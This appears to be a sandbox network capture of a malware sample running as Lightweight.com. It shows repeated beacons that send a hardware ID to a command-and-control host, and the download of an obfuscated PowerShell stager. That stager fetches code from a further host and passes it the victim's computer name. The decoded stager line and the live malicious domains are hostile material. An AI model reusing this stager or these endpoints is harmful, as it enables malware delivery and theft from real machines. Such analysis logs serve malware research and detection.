                                                                                                                                                                              Set-Cookie: PHPSESSID=obnjvp1050rtu33d5m73khj21g; expires=Mon, 21 Apr 2025 11:13:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PdIhAQCP7fZz%2FoPb9mQhrO9u09Ez12ypV22uSnu2arkaKI8MeVBtwCUuarTTqZ9yS17ZBdjM7QXOVsn7ZF6YLQMNQEfXyHt3azQfEfuHZbKOHnGzFEBV5iNKE1ZcybiJjqBOrsk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c697ff777292-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2100&min_rtt=2037&rtt_var=809&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21394&delivery_rate=1433480&cwnd=252&unsent_bytes=0&cid=84ffcefabd7ddf89&ts=980&x=0"
                                                                                                                                                                              2024-12-26 17:26:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.1649713172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:27 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=1ALGZ4CTARQPM
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 637
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:27 UTC637OUTData Raw: 2d 2d 31 41 4c 47 5a 34 43 54 41 52 51 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 31 41 4c 47 5a 34 43 54 41 52 51 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 41 4c 47 5a 34 43 54 41 52 51 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 31 41 4c 47 5a 34 43 54 41 52
                                                                                                                                                                              Data Ascii: --1ALGZ4CTARQPMContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--1ALGZ4CTARQPMContent-Disposition: form-data; name="pid"1--1ALGZ4CTARQPMContent-Disposition: form-data; name="lid"jMw1IE--psyche--1ALGZ4CTAR
                                                                                                                                                                              2024-12-26 17:26:28 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:28 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=d8h3gqu9u7r9ugqbqi15qc4110; expires=Mon, 21 Apr 2025 11:13:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNXs65SwDt7Nz9hEW%2FSXNTlXHqziaXeqjvOcwXGqCxZln4yKg3tsIbXbkrw1b%2F3dW9xSxMU2Z9hXnlAL%2FyUQVVfock8YMHEnkUi39HTEjDlDc1MnqroR28P8oxABIGFCfteexKM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6a75a60c42a-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1461&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1550&delivery_rate=1888745&cwnd=200&unsent_bytes=0&cid=51d7199a8433bb63&ts=774&x=0"
                                                                                                                                                                              2024-12-26 17:26:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.1649714172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:29 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=1RG2I12A0GZ9UYB
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1565
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:29 UTC1565OUTData Raw: 2d 2d 31 52 47 32 49 31 32 41 30 47 5a 39 55 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 31 52 47 32 49 31 32 41 30 47 5a 39 55 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 52 47 32 49 31 32 41 30 47 5a 39 55 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 31 52 47 32
                                                                                                                                                                              Data Ascii: --1RG2I12A0GZ9UYBContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--1RG2I12A0GZ9UYBContent-Disposition: form-data; name="pid"1--1RG2I12A0GZ9UYBContent-Disposition: form-data; name="lid"jMw1IE--psyche--1RG2
                                                                                                                                                                              2024-12-26 17:26:30 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:30 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=8fb89lotufif54ktg2gvs67r95; expires=Mon, 21 Apr 2025 11:13:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYxoeHFpeBEgIWfo3t37g4qLXIKysDpFvfM1IIoWa5GV8loOaNYLVQf%2B83Ix0eDW9IgDGI2cduuvk8NmdU3NqWmmefeaB5Wwn5mL6jvqAoqX8f4g53YrvmW36IgNq3mLdJNv13M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6b63be942b5-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1877&min_rtt=1870&rtt_var=716&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2481&delivery_rate=1512169&cwnd=218&unsent_bytes=0&cid=cecdb4b5380656dc&ts=1177&x=0"
                                                                                                                                                                              2024-12-26 17:26:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.1649715172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:32 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=0HJAY2QJQ8E
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1140
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:32 UTC1140OUTData Raw: 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 30 48 4a 41 59 32 51 4a 51 38 45 0d 0a 43 6f 6e
                                                                                                                                                                              Data Ascii: --0HJAY2QJQ8EContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--0HJAY2QJQ8EContent-Disposition: form-data; name="pid"1--0HJAY2QJQ8EContent-Disposition: form-data; name="lid"jMw1IE--psyche--0HJAY2QJQ8ECon
                                                                                                                                                                              2024-12-26 17:26:32 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:32 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=179f57o6acojq9dn9396j3b32f; expires=Mon, 21 Apr 2025 11:13:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpKs5HdfW2fRtP1I%2BORuLA0WEzDh4zIYVvCzBgxdquRnY9AxkJjXlRkNpzCxl%2B8rLy5BZ%2BCmdHerJWCAeq40WJuFIFJeAY55KTZZ55lfKL%2Ftq8zeY4zcKDY%2BgMLYq7JCVuWtE60%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6c3cda64380-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1583&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2052&delivery_rate=1811414&cwnd=223&unsent_bytes=0&cid=8fab94b0a246973c&ts=815&x=0"
                                                                                                                                                                              2024-12-26 17:26:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.1649716172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:34 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=KACTUHKC32X8JDQ
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1103
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:34 UTC1103OUTData Raw: 2d 2d 4b 41 43 54 55 48 4b 43 33 32 58 38 4a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4b 41 43 54 55 48 4b 43 33 32 58 38 4a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 41 43 54 55 48 4b 43 33 32 58 38 4a 44 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 4b 41 43 54
                                                                                                                                                                              Data Ascii: --KACTUHKC32X8JDQContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--KACTUHKC32X8JDQContent-Disposition: form-data; name="pid"1--KACTUHKC32X8JDQContent-Disposition: form-data; name="lid"jMw1IE--psyche--KACT
                                                                                                                                                                              2024-12-26 17:26:35 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:34 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=0u8ce7bdj75gdboi8khg3aa4kj; expires=Mon, 21 Apr 2025 11:13:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3RVc%2BH3YdP6ZD8KEDqpxTBJC3H3Nrk6Gi6eDKhF8HQq%2BIl2nUNOfVwNTlX%2Fj7Q%2BaeuGP6hFNRgEmbMNydp9J4PTPmc%2FjMX%2BlOC5ucnCWVBmH89ALOUOSAdWxmJDvSH%2B3bTh5xs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6d1bc220f8b-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1504&rtt_var=575&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2019&delivery_rate=1885087&cwnd=237&unsent_bytes=0&cid=673398a7960390b6&ts=820&x=0"
                                                                                                                                                                              2024-12-26 17:26:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-26 17:26:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.1649717172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:36 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 115
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:36 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30
                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=F175BC40C87D05B7D0F23BE3BFA4D7B0
                                                                                                                                                                              2024-12-26 17:26:37 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=vm5vtqk27rju8aegkfoe0ms8ph; expires=Mon, 21 Apr 2025 11:13:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OJY2dWJqsmHGSwUBiRtt2yCu8%2BGK21Smohv1vRNz12wBv4hGai0pohLab876UJL38O1kkwKMJeJG2wid2LDfQLe9uSdx37pZnLnjt2bN%2BlkSO2HmWJAwHb29EO0gzKE2i%2FYdadM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c6df8cec4219-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1737&rtt_var=661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1018&delivery_rate=1644144&cwnd=193&unsent_bytes=0&cid=acf124e5370c17ba&ts=774&x=0"
                                                                                                                                                                              2024-12-26 17:26:37 UTC218INData Raw: 64 34 0d 0a 6d 44 55 79 66 50 61 7a 6f 6d 51 69 62 52 55 34 39 50 79 6b 4e 4b 32 2f 70 69 44 71 79 51 4d 4d 62 62 45 6e 55 54 77 79 2b 64 62 44 54 68 41 4a 31 49 6d 41 44 46 59 5a 5a 55 76 4f 6f 49 74 6f 67 74 7a 44 52 35 2f 6e 63 47 51 43 77 58 74 2b 42 41 66 4f 34 71 6f 44 41 45 6a 43 68 66 35 4c 55 67 55 37 54 49 79 49 68 68 69 50 32 64 49 43 30 50 73 76 4c 67 69 54 48 57 42 42 48 6f 4c 30 37 52 63 49 58 70 37 48 31 68 52 52 56 30 6b 58 71 4e 50 50 57 4d 54 50 31 56 6d 51 70 6d 52 70 46 4a 39 55 4f 56 4e 43 70 66 6e 78 57 30 59 6a 6c 64 2f 53 4f 31 45 46 64 42 61 41 68 4e 41 57 67 5a 33 41 56 4d 6a 7a 4d 53 42 50 31 41 56 72 44 55 2b 6b 0d 0a
                                                                                                                                                                              Data Ascii: d4mDUyfPazomQibRU49PykNK2/piDqyQMMbbEnUTwy+dbDThAJ1ImADFYZZUvOoItogtzDR5/ncGQCwXt+BAfO4qoDAEjChf5LUgU7TIyIhhiP2dIC0PsvLgiTHWBBHoL07RcIXp7H1hRRV0kXqNPPWMTP1VmQpmRpFJ9UOVNCpfnxW0Yjld/SO1EFdBaAhNAWgZ3AVMjzMSBP1AVrDU+k
                                                                                                                                                                              2024-12-26 17:26:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.1649718185.161.251.214432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:39 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: cegu.shop
                                                                                                                                                                              2024-12-26 17:26:39 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:39 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 329
                                                                                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "676c9e2a-149"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-12-26 17:26:39 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.1649719172.67.214.1864432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:41 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: klipsyzogey.shop
                                                                                                                                                                              2024-12-26 17:26:42 UTC905INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:42 GMT
                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                              Content-Length: 8371434
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              ETag: "2a2989ed741c431f4a3276264f7bdb61"
                                                                                                                                                                              Last-Modified: Wed, 25 Dec 2024 17:25:54 GMT
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8F%2F6aG8ARjFg7XQd4Z2rSztBA1EdDadxpJM2QYavjzK5pTeKzgMVDhx0tmJ0UEJXCmCWuBeiOjMGZTkyzdtIQ%2F%2FjSw8HFwjzA8SR8FrOZv%2BoSguCDTkufJRd73Ofeojkh8L%2F"}],"group":"cf-nel","max_age":604800}
